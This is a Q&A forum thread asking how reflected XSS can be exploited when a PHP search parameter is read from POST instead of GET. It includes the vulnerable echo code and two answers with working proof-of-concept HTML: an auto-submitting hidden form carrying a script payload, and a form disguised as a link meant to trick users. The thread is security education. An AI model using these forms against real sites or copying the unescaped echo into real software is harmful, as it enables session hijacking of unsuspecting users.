# What methods are used to exploit XSS if a param echo'd is changed from GET to POST?

Tags: security, xss

Examine this example. It is in PHP, but you should be able to pick up what is happening if you don't know PHP.

```
echo 'You searched for "' . $_GET['q'] . '"';
```

Now, obviously, this is a bad idea, if I request...

```
http://www.example.com/?q=<script type="text/javascript">alert('xss');</script>
```

OK, now I change that GET to a POST...

```
echo 'You searched for "' . $_POST['q'] . '"';
```

Now the query string in the URL won't work.

I know I can't use AJAX to post there, because of same domain policy. If I *can* run JavaScript on the domain, then it already has security problems.

One thing I thought of is coming across a site that is vulnerable to XSS, and adding a form which posts to the target site that submits on load (or, of course, redirecting people to *your* website which does this). This seems to get into CSRF territory.

So, what are the ways of exploiting the second example (using POST)?

Thanks

Answer (score 3, accepted):

Here is an xss exploit for your vulnerable code.  As you have aluded to,  this is an identical attack pattern to [POST based CSRF](http://www.exploit-db.com/exploits/7389/). In this case i am building the POST request as a form,  and then I call `.submit()`  on the form at the very bottom.  In order to call submit,  there must be a submit type in the form.  The post request will immediately execute and the page will redirect,  it is best to run post based csrf of exploits in an invisible iframe.

```
<html>
    <form id=1 method="post" action="http://victim/vuln.php">
        <input type=hidden name="q" value="<script>alert(/xss/)</script>">
        <input type="submit">
    </form>
</html>
<script>
    document.getElementById(1).submit();//remote root command execution!
</script>
```

I also recommended reading about the [sammy worm](http://namb.la/popular/tech.html) and feel free to ask any questions about other [exploits I have written](http://www.exploit-db.com/author/?a=628).

Comment: I love the post about the sammy worm - I read it as few years back, but now I understand it much better. Thanks for posting Rook, I secretly hoped you would :)

Comment: @alex I'm happy to help.   If you want to get my attention feel free to post a reply on one of my posts.

Comment: +1 for sammy worm and for the interesting answer. If one day you have time I would like to hear your thought/answer on this question specifically form a security point of view: http://stackoverflow.com/questions/5052607/cookies-vs-basic-auth

Answer (score 3):

All I would need to do to exploit this is to get a user to click a form that sends a tainted "q" post variable. If I were being all nasty-like, I wouldcraft a form button that looks like a link (or even a link that gets written into a form POST with Javascript, sort of like how Rails does its link_to_remote stuff pre-3.0).

Imagine something like this:

```
    <form id="nastyform" method="post" action="http://yoururl.com/search.php">
      <input type="submit" value="Click here for free kittens!">
      <input type="hidden" name="q" value="<script>alert('My nasty cookie-stealing Javascript')</script>" />
    </form>
    <style>
      #nastyform input {
        border: 0;
        background: #fff;
        color: #00f;
        padding: 0;
        margin: 0;
        cursor: pointer;
        text-decoration: underline;
      }
    </style>
```

If I can get a user to click that (thinking that he's clicking some innocent link), then I can post arbitrary data to the search that then gets echoed into his page, and I can hijack his session or do whatever other nasty things I want.

Post data isn't inherently more secure than get data; it's still user input and absolutely cannot be trusted.

CSRF attacks are a different class of attack, where some legitimate action is initiated without the permission of the user; this has the same sort of entry vector, but it's a classic XSS attack, designed to result in the injection of malicious Javascript into the page for the purpose of gaining session access or something similarly damaging.

Comment: Thanks for your answer. *This seems to get into CSRF territory.* was meant to mean that exploiting POST requires a cross site attack (like in your example) - not just modifying the query string.

Comment: Well, in practicality, the type of XSS attack you're talking about would be launched cross-site anyhow. Unless you're reading unfiltered data from the database and constructing pages with it for other users to see, the attack vector is going to be entry from a maliciously-crafted link somewhere else.